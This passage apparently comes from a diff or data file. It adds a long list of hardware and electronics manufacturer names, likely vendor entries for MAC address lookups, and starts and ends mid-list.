CO.,LTD.", + "Worldplay (Canada) Inc.", + "Seowoo Inc.", + "Adaptive Spectrum and Signal Alignment (ASSIA), Inc.", + "Genoray", + "ShenZhen Rapoo Technology Co., Ltd.", + "Partron", + "Abrantix AG", + "Beijing Rongcheng Hutong Technology Co., Ltd.", + "Kingspan Environmental Ltd", + "Medtronic Diabetes", + "Dropcam", + "Voismart", + "3pleplay Electronics Private Limited", + "Point Core SARL", + "Bejing DAYO Mobile Communication Technology Ltd.", + "Oraya Therapeutics", + "Corporation of the Presiding Bishop of The Church of Jesus Christ of Latter-day Saints", + "ClarIDy Solutions, Inc.", + "Advanced Wireless Dynamics S.L.", + "Athena Wireless Communications Inc", + "LiveU Ltd.", + "Nanotec Electronic GmbH & Co. KG", + "Beijing C&W Optical Communication Technology Co.,Ltd.", + "Onzo Ltd", + "Network Video Technologies, Inc", + "Kellendonk Elektronik GmbH", + "ORBIT MERRET, spol. s r. o.", + "Cosmo Co., Ltd", + "Panasonic Electric Works Automation Controls Techno Co.,Ltd.", + "Speco Technologies", + "eMegatech International Corp.", + "Anovo", + "Norbit Its", + "Thuh Company", + "Kove", + "ioBridge, Inc.", + "Hydro Systems Company", + "Corporacion Empresarial Altra SL", + "WhereWhen Corp", + "COMPUTER OFFICE Co.,Ltd.", + "MacroSAN Technologies Co., Ltd.", + "VTC Electronics Corp.", + "Logic S.p.A.", + "Terumo Corporation", + "Magneti Marelli S.p.A. Powertrain", + "Turtle Industry Co., Ltd.", + "Vtion Information Technology (Fujian) Co.,Ltd", + "Eastriver Technology Co., Ltd.", + "Crystal Vision Ltd", + "Neopis Co., Ltd.", + "Reno A&E", + "Cots Technology", + "Taishan Online Technology Co., Ltd.", + "Seers Technology Co., Ltd", + "Magicjack LP", + "Cirtec Medical Systems", + "Seetech", + "DMATEK Co., Ltd.", + "Henri Depaepe S.a.s.", + "Azuray Technologies", + "Eoslink", + "Hang Zhou Huite Technology Co.,ltd.", + "TASCAN Systems GmbH", + "Dome Imaging Inc", + "Qulsar Inc", + "OptiLogix BV", + "MS Sedco", + "OAO Izhevskiy radiozavod", + "Wireless Seismic", + "DIGITRONIC Automationsanlagen GmbH", + "messMa GmbH", + "Vaddio", + "AOBO Telecom Co.,Ltd", + "STEMMER IMAGING GmbH", + "AirNav Systems LLC", + "Nr Electric Co., Ltd", + "Cello Electronics (UK) Ltd", + "Vutrix Technologies Ltd", + "Neousys Technology Inc.", + "Unified Packet Systems Crop", + "iiNet Labs Pty Ltd", + "ThinkEco, Inc.", + "KTIS CO., Ltd", + "White Rodgers Division", + "Shanghai WDK Industrial Co.,Ltd.", + "IDFone Co., Ltd.", + "Brady Corp Asia Pacific Ltd", + "Proformatique", + "Embedded Automation, Inc.", + "Csst", + "Daeyoung Information System Co., Ltd", + "Exponent", + "Cerio Corporation", + "Fujikon Industrial Co.,Limited", + "Trendsetter Medical, LLC", + "Technical Consumer Products, Inc.", + "TP Vision Belgium N.V. - innovation site Brugge", + "citygrow technology co., ltd", + "BizLink Special Cables Germany GmbH", + "Smartlabs", + "Shenou Communication Equipment Co.,Ltd", + "Minicom Digital Signage", + "M2M Solution S.A.S.", + "SYStronics Co., Ltd.", + "Thompson Aerospace", + "Dexin Corporation", + "Lansentechnology AB", + "Biodit", + "A+V Link Technologies, Corp.", + "S & S Research Inc.", + "RF Surgical System Inc.", + "3S System Technology Inc.", + "NDC Technologies", + "Cobalt Digital Inc.", + "Minetec Wireless Technologies", + "PRAVIS SYSTEMS Co.Ltd.,", + "YSI, Inc.", + "Spica international", + "CardioTek B.V.", + "Topcon Corporation", + "CONCH ELECTRONIC Co.,Ltd", + "Tonalite Holding B.V.", + "OPWILL Technologies CO .,LTD", + "BodyMedia, Inc.", + "Shenzhen Longway Technologies Co., Ltd", + "Panaccess Systems GmbH", + "Raytheon BBN Technologies", + "Linear Equipamentos Eletronicos SA", + "IES GmbH & Co. KG", + "OOO Samlight", + "Zonar Systems", + "Top Eight Ind Corp", + "Naviit Inc.", + "ABB n.v. Power Quality Products", + "STRONG Ges.m.b.H.", + "Wireless Glue Networks, Inc.", + "Cosco Electronics Co., Ltd.", + "Enclustra GmbH", + "Umpi srl", + "Raster Vision Ltd", + "Yoga", + "Action Target, Inc.", + "ATEK Products, LLC", + "Highgates Technology", + "Smak Tecnologia e Automacao", + "Radius Gateway", + "Prescope Technologies CO.,LTD.", + "airPointe of New Hampshire", + "EMPORIA TELECOM Produktions- und VertriebsgesmbH & Co KG", + "Radio Data Comms", + "Beijing Omnific Technology, Ltd.", + "Systemhouse Solutions AB", + "Bilkon Bilgisayar Kontrollu Cih. Im.Ltd.", + "Prysm Inc", + "Wi-Fi Alliance", + "Calsys, Inc.", + "Sipod Inc.", + "Trump s.a.", + "Deltanet AG", + "Stella-Green Co", + "Unglaube Identech GmbH", + "OTN Systems N.V.", + "tdvine", + "Uni-Link Technology Co., Ltd.", + "ENMAS GmbH", + "Electro-Metrics Corporation", + "Young Electric Sign Co", + "Promethean Limited", + "Gnodal Ltd", + "Individual Computers GmbH", + "A&D Engineering Co., Ltd.", + "Shenzhen Dehoo Technology Co.,Ltd", + "McCain Inc", + "Argosy Technologies, Ltd.", + "Promax Electronica Sa", + "Auto Industrial Co., Ltd.", + "Hwa Yao Technologies Co., Ltd", + "Aus.Linx Technology Co., Ltd.", + "GLP German Light Products GmbH", + "Midas Klark Teknik Ltd", + "Omnitronics Pty Ltd", + "Net One Partners Co.,Ltd.", + "Kexiang Information Technology Co, Ltd.", + "Core Staff Co., Ltd.", + "U & B tech", + "Fulan Electronics Limited", + "Geminico co.,Ltd.", + "Hioso Technology Co., Ltd.", + "Elettronica GF S.r.L.", + "Shaanxi Hitech Electronic Co., LTD", + "Viltechmeda UAB", + "Bi2-Vision", + "Telekom Research and Development Sdn Bhd", + "AWCER Ltd.", + "Talaris (Sweden) AB", + "TONGQING COMMUNICATION EQUIPMENT (SHENZHEN) Co.,Ltd", + "Gemicom Technology, Inc.", + "Smart electronic GmbH", + "Sigrist-Photometer AG", + "Telecsys", + "Orantek Limited", + "Plastoform Industries Ltd.", + "Vig", + "A.O. Smith Water Products", + "Edeltech Co.,Ltd.", + "Rorze Corporation", + "Bionics Corp.", + "TM-Research Inc.", + "Hatteland Computer AS", + "Ocom Communications, Inc.", + "Cybertelbridge co.,ltd", + "OzVision America LLC", + "Erco & Gener", + "ghe-ces electronic ag", + "NT-ware Systemprg GmbH", + "Shang Hai Tyd. Electon Technology Ltd.", + "Antaira Technologies, LLC", + "Pixavi AS", + "U2S co.", + "Dvl", + "Star-Net", + "Orb Networks, Inc.", + "DIRECTV, Inc.", + "ViE Technologies Sdn. Bhd.", + "Wearable Inc.", + "Red Embedded Design Limited", + "ShenZhen Telacom Science&Technology Co., Ltd", + "Meritec", + "Lumens Digital Optics Inc.", + "NASCENT Technology", + "Eterna Technology, Inc.", + "Teledata Networks", + "Create New Technology (HK) Limited Company", + "C Technologies AB", + "Informtekhnika & Communication, LLC", + "Actioncable, Inc.", + "Mobile Device, Inc.", + "Most Lucky Trading Ltd", + "VideoHome Technology Corp.", + "Yokota Industrial Co,.Ltd", + "Shanghai SEARI Intelligent System Co., Ltd", + "TechSAT GmbH", + "DigiView S.r.l.", + "Datecs Ltd.,", + "Total Walther GmbH", + "Gsk Cnc Equipment Co.,Ltd", + "SUMMIT DEVELOPMENT, spol.s r.o.", + "SCAPS GmbH", + "Jiangxi Jinggangshan Cking Communication Technology Co.,Ltd", + "Hanilstm Co., Ltd.", + "BSP Co., Ltd.", + "Mine Site Technologies", + "Fox Crypto B.V.", + "JDC Tech Co., Ltd.", + "MaxID (Pty) Ltd", + "Prowave Technologies Ltd.", + "Alec Sicherheitssysteme GmbH", + "Suzhou NEW SEAUNION Video Technology Co.,Ltd", + "Adura Technologies", + "Lift Complex DS, JSC", + "MKD Technology Inc.", + "Minsung Electronics", + "Seamap (UK) Ltd", + "AEG Power Solutions", + "General Jack Technology Ltd.", + "Wireless Measurement Ltd", + "Navis Auto Motive Systems, Inc.", + "Kenmec Mechanical Engineering Co., Ltd.", + "Cinch Connectors", + "AUTOVISION Co., Ltd", + "KM Electornic Technology Co., Ltd.", + "Semihalf", + "Pcube Systems, Inc.", + "moblic", + "NOOLIX Co., Ltd", + "Carina System Co., Ltd.", + "ZT Group Int'l Inc", + "QVidium Technologies, Inc.", + "PurpleComm, Inc.", + "Alta Solutions, Inc.", + "Logic Instrument SA", + "Deif A/S", + "Dti", + "ProtectedLogic Corporation", + "Logiways", + "Ktnf", + "Apacewave Technologies", + "Ablaze Systems, LLC", + "IKT Advanced Technologies s.r.o.", + "Chengdu Jiuzhou Electronic Technology Inc", + "Juphoon System Software Inc.", + "Emitech Corp.", + "Circontrol S.A.", + "Trapeze Networks", + "Bachmann Technology GmbH & Co. KG", + "MIA Corporation", + "Instrumentation Technologies d.d.", + "Everspring Industry Co., Ltd.", + "Shanghai Seeyoo Electronic & Technology Co., Ltd", + "MediaSputnik", + "Geophysical Survey Systems, Inc.", + "Laurel Bank Machines Co., Ltd.", + "GMK electronic design GmbH", + "Ansaldo STS USA", + "Shenzhen Wistar Technology Co., Ltd", + "Central Network Solution Co., Ltd.", + "Beijing Soul Technology Co.,Ltd.", + "Trimax Wireless, Inc.", + "Alta Definicion LINCEO S.L.", + "Secura Key", + "ATI Electronics(Shenzhen) Co., LTD", + "Robonica (Pty) Ltd", + "Mobile Communications Korea Incorporated", + "S-Access GmbH", + "ZillionTV Corporation", + "Italdata Ingegneria dell'Idea S.p.A.", + "Costar electronics, inc.,", + "PointRed Telecom Private Ltd.", + "Genie Industries, Inc.", + "Equipson S.A.", + "Broadband Forum", + "Azimut Production Association JSC", + "Luxtera Inc", + "DatNet Informatikai Kft.", + "The Weather Channel", + "GZT Telkom-Telmor sp. z o.o.", + "gt german telematics gmbh", + "Maquet Cardiopulmonary AG", + "Lightcomm Technology Co., Ltd", + "Philips CareServant", + "Power PLUS Communications AG", + "Maquet Critical Care AB", + "Vertex Wireless Co., Ltd.", + "Pittasoft", + "Cloud Engines, Inc.", + "Kiryung Electronics", + "Stirling Energy Systems", + "QuoPin Co., Ltd.", + "Ibridge Networks & Communications Ltd.", + "Graf-Syteco GmbH & Co. KG", + "Dycor Technologies Ltd.", + "Shenzhen SOGOOD Industry CO.,LTD.", + "Fascinations Toys and Gifts, Inc.", + "Autonet Mobile", + "Broadband Solutions Group", + "Tobii Technology AB", + "Ag Leader Technology", + "TELESTAR DIGITAL GmbH", + "Sonim Technologies Inc", + "Hilger u. Kern GMBH", + "Miyoshi Electronics Corporation", + "Seanodes", + "Mobilarm Ltd", + "free alliance sdn bhd", + "Action Star Enterprise Co., Ltd.", + "Digitalbox Europe GmbH", + "Shenzhenshi chuangzhicheng Technology Co.,Ltd", + "Ssi Computer Corp", + "FuGang Electronic (DG) Co.,Ltd", + "Magnetic Autocontrol GmbH", + "PharmaSmart LLC", + "Ishii Tool & Engineering Corporation", + "Storwize, Inc.", + "Halo Monitoring, Inc.", + "MMB Research Inc.", + "ReDriven Power Inc.", + "Fusion MultiSystems dba Fusion-io", + "Autronica Fire And Securirty", + "RG Nets, Inc.", + "TVLogic", + "US Beverage Net", + "Telem Sas", + "Phybridge Inc", + "SAMSUNG Electronics. Co. LTD", + "Lux Lumen", + "Radiation Safety and Control Services Inc", + "Airbus Defence and Space Deutschland GmbH", + "Digital Ally, Inc.", + "Mainpine, Inc.", + "Intelligent Mechatronic Systems Inc", + "Ortana Ltd", + "Algolware Corporation", + "V.T. Telematica S.p.a.", + "IMI Hydronic Engineering international SA", + "InMage Systems Inc", + "Lengda Technology(Xiamen) Co.,Ltd.", + "Whdi Llc", + "G-Pro Computer", + "INO Therapeutics LLC", + "WAREMA Renkhoff SE", + "Hinke A/S", + "Innovation Farm, Inc.", + "SEA Signalisation", + "Sichuan Tianyi Information Science & Technology Stock CO.,LTD", + "Kita Denshi Corporation", + "Cummins-Allison Corp.", + "Beijing Detianquan Electromechanical Equipment Co., Ltd", + "Elster Solutions, LLC", + "Algo Communication Products Ltd", + "Rustelcom Inc.", + "3 Greens Aviation Limited", + "Idealbt Technology Corporation", + "Linkflex Co.,Ltd", + "Advanced Card Systems Ltd.", + "Sielox LLC", + "Gloscom Co., Ltd.", + "Aprius, Inc.", + "DATASENSOR S.p.A.", + "Janam Technologies LLC", + "Pollin Electronic GmbH", + "F E T Elettronica snc", + "Coffee Equipment Company", + "Global Star Solutions ULC", + "Protecta Electronics Ltd", + "Translogic Corporation", + "SmartRG Inc", + "IOLAN Holding", + "Avitech International Corp", + "FamilyPhone AB", + "BEP Marine", + "Koos Technical Services, Inc.", + "LinkSprite Technologies, Inc.", + "Multimedia & Communication Technology", + "Analogix Seminconductor, Inc", + "Norcott", + "GSS Grundig SAT-Systems GmbH", + "Sei S.p.A.", + "Shenzhen Turbosight Technology Ltd", + "AverLogic Technologies, Inc.", + "Verismo Networks Inc", + "Lastar, Inc.", + "Desay A&V Science And Technology Co.,Ltd", + "Astron", + "8086 Consultancy", + "Triple EYE B.V.", + "Bigelow Aerospace", + "Evoc Intelligent Technology Co.,Ltd.", + "INFORSON Co,Ltd.", + "SieAmp Group of Companies", + "Teratronik elektronische systeme gmbh", + "Tv-Numeric", + "Anatek, Llc", + "Rinnai Korea", + "National Source Coding Center", + "Bystronic Laser AG", + "Lacroix Traffic S.a.u", + "Breeze Innovations Ltd.", + "Compumedics Ltd", + "FutureLogic Inc.", + "maintech GmbH", + "LiveTV", + "Shibaura Vending Machine Corporation", + "SymCom, Inc.", + "Special Design Bureau for Seismic Instrumentation", + "Hidea Solutions Co. Ltd.", + "Mobile Appliance, Inc.", + "Riken Keiki Co., Ltd.", + "Digital Solutions Ltd", + "Tyco Telecommunications", + "General Satellite Research & Development Limited", + "Style Flying Technology Co.", + "EMC Corporation", + "Intraco Technology Pte Ltd", + "Pyxis S.r.l.", + "Nordic ID Oy", + "Micromint", + "ERLPhase Power Technologies Ltd.", + "CSJ Global, Inc.", + "CORNELL Communications, Inc.", + "Russound", + "ABB Oy / Medium Voltage Products", + "Kaco Solar Korea", + "Adesys BV", + "GWD Media Limited", + "Transcon Electronic Systems, spol. s r. o.", + "PHYWE Systeme GmbH & Co. KG", + "Uniphone Inc.", + "Hylab Technology Inc.", + "Masterclock, Inc.", + "Blynke Inc.", + "Dataline AB", + "Sequel Technologies", + "LInTech Corporation", + "Radlive", + "Cermetek Microelectronics, Inc.", + "EN Technologies Inc.", + "AliphCom", + "Simet", + "Network Supply Corp.,", + "4Ipnet, Inc.", + "NIW Solutions", + "Nakajima All Precision Co., Ltd.", + "Trio Datacom Pty Ltd", + "I/O Interconnect Inc.", + "Brown Innovations, Inc", + "Fulhua Microelectronics Corp. Taiwan Branch", + "Shenzhen Mopnet Industrial Co.,Ltd", + "Jow Tong Technology Co Ltd", + "Posbro", + "BERTANA srl", + "CCS Inc.", + "Accel Semiconductor Corp", + "Teleplan Technology Services Sdn Bhd", + "Martinsson Elektronik AB", + "JSC Goodwin-Europa", + "Pingood Technology Co., Ltd.", + "Commtech Technology Macao Commercial Offshore Ltd.", + "Blue Fox Porini Textile", + "Segnetics LLC", + "Stilo srl", + "S.& A.S. Ltd.", + "Toledo Do Brasil Industria De Balancas Ltda", + "Select Engineered Systems", + "Pixelmetrix Corporation Pte Ltd", + "LEVEL s.r.o.", + "Lung Hwa Electronics Co., Ltd.", + "MBS GmbH", + "Giken Trastem Co., Ltd.", + "Keyprocessor B.V.", + "Ingespace", + "Cantronic International Limited", + "Byd Company Limited", + "Wasko S.a.", + "Etherstack plc", + "Air802 Llc", + "Prominvest", + "Hakusan.Mfg.Co,.Ltd", + "KYLAND Technology Co. LTD", + "Haas Automation Inc.", + "Talk-A-Phone Co.", + "Wintech Automation Co.,Ltd.", + "Cryptsoft Pty Ltd", + "Ophir Optronics Ltd", + "Wingtech Group Limited", + "Zensys", + "Radio Systems Design, Inc.", + "Lumexis Corporation", + "Aisin Corporation", + "Magna-Power Electronics, Inc.", + "Beijing Bluexon Technology Co.,Ltd", + "RESOL Elektronische Regelungen GmbH", + "Vibro-Meter SA", + "Further Tech Co., LTD", + "DAKO EDV-Ingenieur- und Systemhaus GmbH", + "Teltonika", + "Realease Limited", + "CBM of America", + "SanDisk Corporation", + "Hunkeler AG", + "Brunata a/s", + "Wellspring Wireless", + "Dynamic System Electronics Corp.", + "Crescendo Networks", + "Kumho Eng Co.,Ltd", + "Zhejiang Bell Technology Co.,ltd", + "Intertain Inc.", + "SWS Australia Pty Limited", + "Ecolab", + "C-BEL Corporation", + "Marine Sonic Technology, Ltd.", + "Keytronix", + "Centec Networks Inc", + "Beijing Jiaxun Feihong Electricial Co., Ltd.", + "SNR Inc.", + "Hangzhou System Technology CO., LTD", + "MATT R.P.Traczynscy Sp.J.", + "Radiient Technologies, Inc.", + "NETCLEUS Systems Corporation", + "Saka Techno Science Co.,Ltd", + "Intel – GE Care Innovations LLC", + "SYRIS Technology Corp", + "Longkay Communication & Technology (Shanghai) Co. Ltd", + "Pylone, Inc.", + "EMCO Flow Systems", + "Modacom", + "Climax Technology Co., Ltd", + "Alereon, Inc.", + "Control Dynamics Pty. Ltd.", + "Mitra Energy & Infrastructure", + "CAETEC Messtechnik", + "Babcock & Wilcox Power Generation Group, Inc", + "Wuhan Pont Technology CO. , LTD", + "Foss Analytical A/S", + "Sensus", + "Ice Energy, Inc.", + "ClariPhy Communications, Inc.", + "Gateway, Inc.", + "Call Direct Cellular Solutions", + "OvisLink S.A.", + "Power Standards Lab", + "Cybertech Telecom Development", + "Quartics Inc", + "NextGen Venturi LTD", + "Perfectone Netware Company Ltd", + "Segnet Ltd.", + "Syswan Technologies Inc.", + "USC DigiArk Corporation", + "Plato Networks Inc.", + "Galaxy Technology Limited", + "Forth Corporation Public Company Limited", + "CastGrabber, LLC", + "Carpoint Co.,Ltd", + "ZeeVee, Inc.", + "ZP Engineering SEL", + "Rocon PLC Research Centre", + "EleSy JSC", + "Attero Tech, LLC.", + "Bellon Pty Ltd", + "Production Resource Group, LLC", + "Lucky Technology (Hk) Company Limited", + "Gefen LLC", + "Tervela", + "Cirrascale Corporation", + "Pano Logic", + "Nonin Medical Inc.", + "Airgain, Inc.", + "ABB Oy Drives", + "Millennia Media inc.", + "802automation Limited", + "Townet Srl", + "Anhui Sun Create Electronics Co., Ltd", + "Ucamp Co.,Ltd", + "Envisacor Technologies Inc.", + "Kworld Computer Co., Ltd", + "Value Platforms Limited", + "Aplix IP Holdings Corporation", + "Bio-Rad Laboratories, Inc.", + "Mode Lighting (UK ) Ltd.", + "Synergy Lighting Controls", + "Hyperstone GmbH", + "Strato Rechenzentrum AG", + "Ultratec, Inc.", + "Integrated Control Technology Limitied", + "RFTech Co.,Ltd", + "Vololink Pty Ltd", + "Apollo Imaging Technologies, Inc.", + "Tehuti Networks Ltd.", + "Bosch Access Systems GmbH", + "A & R Cambridge", + "ULTRA-X ASIA PACIFIC Inc.", + "Electronic Computer Systems, Inc.", + "XenICs nv", + "Åmic AB", + "General Sensing", + "Kmc Chain Industrial Co., Ltd.", + "Albis Technologies AG", + "Vamp Ltd.", + "AlsterAero GmbH", + "Biz-2-Me Inc.", + "Autocom Products Ltd", + "C.t. Elettronica", + "Voxtel, Inc.", + "Radio Terminal Systems Pty Ltd", + "PePWave Ltd", + "iPOX Technology Co., Ltd.", + "Jiagnsu Aetna Electric Co.,Ltd", + "Joby Inc.", + "Evolis", + "Action Technology (SZ) Co., Ltd", + "HART Communication Foundation", + "Carex Lighting Equipment Factory", + "Signtech", + "MI.TEL s.r.l.", + "Diostech Co., Ltd.", + "Wuhan Yangtze Optical Technology CO.,Ltd.", + "Infinite QL Sdn Bhd", + "Anseri Corporation", + "U4EA Technologies Ltd", + "Delorme", + "ADEC & Parter AG", + "Skipper Wireless, Inc.", + "TRUMPF Laser Marking Systems AG", + "3Way Networks Ltd", + "NV Michel Van de Wiele", + "ACA-Digital Corporation", + "GT&T Engineering Pte Ltd", + "Coastal Environmental Systems", + "Ice Qube, Inc", + "PChome Online Inc.", + "Teak Technologies, Inc.", + "Alfred Mann Foundation", + "JWTrading Co., Ltd", + "Toyo Medic Co.,Ltd.", + "FEI-Zyfer, Inc.", + "Optibase Ltd", + "PT. Ufoakses Sukses Luarbiasa", + "ICX Technologies", + "Salicru, S.a.", + "Micro Vision Co.,LTD", + "Ajin Vision Co.,Ltd", + "INOCOVA Co.,Ltd", + "Adaptive Micro-Ware Inc.", + "ASI Communications, Inc.", + "XYnetsoft Co.,Ltd", + "Austar Technology (hang zhou) Co.,Ltd", + "Arrow7 Corporation", + "TurboChef Technologies Inc.", + "Soft Device Sdn Bhd", + "Sato Corporation", + "Ctring", + "ACOGITO Co., Ltd", + "Cianet Industria e Comercio S/A", + "Tentel Comtech Co., Ltd.", + "TELDAT Sp.J.", + "Guangzhou Unicomp Technology Co.,Ltd", + "Doorking Inc.", + "Xipher Technologies, LLC", + "Etrovision Technology", + "Stanford Research Systems", + "Novera Optics Korea, Inc.", + "Blaupunkt Embedded Systems GmbH", + "Fossil Partners, L.P.", + "On Software International Limited", + "RDI technology(Shenzhen) Co.,LTD", + "Pitney Bowes, Inc", + "ImCoSys Ltd", + "Duaxes Corporation", + "Encore Electronics, Inc.", + "Optimal Technologies International Inc.", + "JOYTOTO Co., Ltd.", + "Numata Corporation", + "Escape Communications, Inc.", + "Computer Hardware Design SIA", + "EPL Technology Ltd", + "Swirlnet A/S", + "Erae Electronics Industry Co., Ltd", + "ISONAS Inc.", + "ANSA Corporation", + "ASTEL Inc.", + "Kameleon Technologies", + "Navcast Inc.", + "GOTIVE a.s.", + "Infinova LLC", + "nVent, Schroff GmbH", + "Crypto S.A.", + "Pulsar-Telecom LLC.", + "Vertex Link Corporation", + "Zippy Technology Corp.", + "Shenzhen Photon Broadband Technology Co.,Ltd", + "Cierma Ascenseurs", + "Veritech Electronics Limited", + "uControl, Inc.", + "Dawon Media Inc.", + "S3C, Inc.", + "El-Tech, Inc.", + "Metasystem SpA", + "4NSYS Co. Ltd.", + "RGB Spectrum", + "StorLink Semiconductors, Inc.", + "Secfone Kft", + "TagMaster AB", + "dSys", + "Screen Service Spa", + "CEC Wireless R&D Ltd.", + "Opticom Communications, LLC", + "Lig Neoptek", + "Talos System Inc.", + "Motech Industries Inc.", + "Canko Technologies Inc.", + "Bluechips Microhouse Co.,Ltd.", + "GDX Technologies Ltd.", + "Cross Match Technologies Inc", + "KTF Technologies Inc.", + "Tonze Technology Co.", + "Fanstel Corp.", + "SightLogix, Inc.", + "ArcSoft Shanghai Co. LTD", + "Kimaldi Electronics, S.L.", + "Azonic Technology Co., LTD", + "Ningbo Yidong Electronic Co.,Ltd.", + "Darts Technologies Corp.", + "FITRE S.p.A.", + "Image Sensing Systems, Inc.", + "Winegard Company", + "Zenitron Corporation", + "Brother, Brother & Sons ApS", + "Naito Densei Machida MFG.CO.,LTD", + "Zinwave Ltd", + "Cymphonix Corp", + "Solar Technology, Inc.", + "LeucotronEquipamentos Ltda.", + "ADC Telecommunications", + "FXC Inc.", + "Global Technologies Inc.", + "m2c Electronic Technology Ltd.", + "ASTRO Strobel Kommunikationssysteme GmbH", + "Assa Abloy Ab", + "NT MicroSystems, Inc.", + "Qno Technology Inc.", + "Trimble", + "ATI Industrial Automation", + "Semtech Corporation", + "OmniSense, LLC", + "Eidicom Co., Ltd.", + "Dynamix Promotions Limited", + "Weathernews Inc.", + "DriveCam Inc", + "Photonicbridges (China) Co., Ltd.", + "BT-Links Company Limited", + "Fordley Development Limited", + "Gigabeam Corporation", + "SiRF Technology, Inc.", + "CAST Information Co., Ltd", + "Dalian Golden Hualu Digital Technology Co.,Ltd", + "CETRTA POT, d.o.o., Kranj", + "Inew Digital Company", + "Antik computers & communications s.r.o.", + "Nivus GmbH", + "Colorado Vnet", + "Dametric AB", + "Xteam", + "Space Shuttle Hi-Tech Co., Ltd.", + "Arbitron Inc.", + "Tps", + "KBT Mobile", + "Flex-P Industries Sdn. Bhd.", + "Exeo Systems", + "Quorion Data Systems GmbH", + "ServerEngines LLC", + "Paralan Corporation", + "OMS Motion", + "Vimtron Electronics Co., Ltd.", + "Quadrics Ltd", + "Moser-Baer AG", + "Shenzhen Union Networks Equipment Co.,Ltd.", + "TV One Ltd", + "Fulcrum Microsystems, Inc.", + "Omnex Control Systems", + "SWEEX Europe BV", + "Ceyon Technology Co.,Ltd.", + "CelleBrite Mobile Synchronization", + "Eventide", + "Digital Telemedia Co.,Ltd.", + "3M Germany", + "Advanced Industrial Computer, Inc.", + "Nittan Company, Limited", + "Msi", + "Bixolon Co.,Ltd", + "Carina Technology", + "Ideal Industries", + "Curves International Inc.", + "DCI Co., Ltd.", + "FlexiPanel Ltd", + "Iritel A.d.", + "Wanshih Electronic Co., Ltd", + "Saunders Electronics", + "Netronome Systems, Inc.", + "Dixtal Biomedica Ind. Com. Ltda", + "Data Center Systems", + "Openbrain Technologies Co., Ltd.", + "Hoana Medical, Inc.", + "Neo Photonics", + "Game Plus Co., Ltd.", + "Liab ApS", + "NTT Advanced Technology Corporation", + "IVT corporation", + "Salutica Allied Solutions Sdn Bhd", + "Aonvision Technolopy Corp.", + "Beacon Medical Products LLC d.b.a. BeaconMedaes", + "Balboa Instruments", + "Horoquartz", + "Radiocrafts AS", + "Technodrive srl", + "Kocom", + "OTE Spa", + "Powertech co.,Ltd", + "Leneco", + "StoreAge Networking Technologies", + "AiZen Solutions Inc.", + "Elim Product Co.", + "coM.s.a.t. AG", + "Perfisans Networks Corp.", + "A-First Technology Co., Ltd.", + "Lunatone Industrielle Elektronik GmbH", + "INVISIO Communications", + "Wink communication technology CO.LTD", + "mCubelogics Corporation", + "Wizlogics Co., Ltd.", + "Teranetics, Inc.", + "Ashly Audio, Inc.", + "B15402100 - Jandei, S.l.", + "Carvers SA de CV", + "Enswer Technology Inc.", + "Datastore Technology Corp", + "Covergence Inc.", + "K Technology Corporation", + "AIM Infrarotmodule GmbH", + "Sage Instruments Inc.", + "HI-P Tech Corporation", + "Artech Electronics", + "ViXS Systems Inc", + "Elin Ebg Traction Gmbh", + "First International Computer, Inc.", + "Minerva Korea Co., Ltd", + "SiCortex, Inc", + "Hitachi-LG Data Storage Korea, Inc", + "InnerWireless", + "Aeon Digital International", + "MultiCom Industries Limited", + "Bookham Inc", + "Edge Products", + "Heim Systems GmbH", + "Calculex,Inc.", + "WJ Communications, Inc.", + "Atto Corporation", + "BOAZ Inc.", + "AirLink Communications, Inc.", + "Sensovation AG", + "Jumpnode Systems LLC.", + "V Center Technologies Co., Ltd.", + "P.A. Semi, Inc.", + "H. Stoll GmbH & Co. KG", + "Princeton Instruments", + "Zenitel Norway AS", + "4Access Communications", + "Beyond Achieve Enterprises Ltd.", + "Qsan Technology, Inc.", + "Netvox Technology Co., Ltd.", + "CHIPS & Systems, Inc.", + "Cintech", + "Giga-byte Communications Inc.", + "Psitek (Pty) Ltd", + "VeriWave, Inc.", + "Virtual Conexions", + "Bm Spa", + "Telemotive AG", + "congatec GmbH", + "Tanisys Technology", + "STAC Corporation.", + "Sunmyung Electronics Co., LTD", + "OpenGear, Inc", + "Diskware Co., Ltd", + "Narayon. Co., Ltd.", + "OnSite Systems, Inc.", + "FLIR Radiation Inc", + "Project T&E Limited", + "Biospace Co., Ltd.", + "ShinHeung Precision Co., Ltd.", + "Rapidus Wireless Networks Inc.", + "Fresenius-Vial", + "iWise Communications", + "MAZ Brandenburg GmbH", + "Schneider Electric Ultra Terminal", + "ECM Systems Ltd", + "Data Acquisitions limited", + "Mdk Co.,Ltd.", + "Belco International Co.,Ltd.", + "Ifotec", + "Imarda New Zealand Limited", + "EGEMEN Bilgisayar Muh San ve Tic LTD STI", + "GuangZhou Post & Telecom Equipment ltd", + "WNI Resources, LLC", + "Scanvaegt International A/S", + "DGSTATION Co., Ltd.", + "HF System Corporation", + "Ponder Information Industries Ltd.", + "Honda Electron Co., LED.", + "Vision Research, Inc.", + "Speed Dragon Multimedia Limited", + "IronGate S.L.", + "CSS Inc.", + "Advanced Cybernetics Group", + "Mechatronic Brick Aps", + "SECURAY Technologies Ltd.Co.", + "Fraunhofer IMS", + "Shengqu Information Technology (Shanghai) Co., Ltd.", + "Codan Limited", + "BluePacket Communications Co., Ltd.", + "E2S Electronic Engineering Solutions, S.L.", + "Mico Electric(Shenzhen) Limited", + "Ontimetek Inc.", + "Echolab LLC", + "Avantec Manufacturing Limited", + "WiLife, Inc.", + "ASEM SpA", + "HotLava Systems, Inc.", + "PTW Freiburg", + "Radio Components Sweden AB", + "Swegon Ab", + "International Bar Code", + "Sanyu Industry Co.,Ltd.", + "iQuest (NZ) Ltd", + "Head Strong International Limited", + "Fastrax Ltd", + "Chinasys Technologies Limited", + "Terrasat Communications, Inc.", + "Spectra Technologies Holdings Company Ltd", + "nVent", + "Delta Elettronica S.p.A.", + "B.Braun Melsungen AG", + "PLUS Corporation", + "Metrohm AG", + "ARUZE Corporation", + "Swisscom Hospitality Services SA", + "Caen", + "CyberNet Inc.", + "Redux Communications Ltd.", + "OPTOELECTRONICS Co., Ltd.", + "IPS d.o.o.", + "ERUNE technology Co., Ltd.", + "Posystech Inc., Co.", + "Camille Bauer", + "Inducon BV", + "SetaBox Technology Co., Ltd.", + "Second Rule LLC", + "Pixim", + "Actuality Systems, Inc.", + "Category Solutions, Inc", + "Netforyou Co., LTD.", + "DEXTER Communications, Inc.", + "Integrated System Solution Corp.", + "NextGenTel Holding ASA", + "Terminales de Telecomunicacion Terrestre, S.L.", + "Jacobsons AB", + "Büchi Labortechnik AG", + "Glunz & Jensen", + "Shenzhen Forward Industry Co., Ltd", + "Trustable Technology Co.,Ltd.", + "Fortuna Electronic Corp.", + 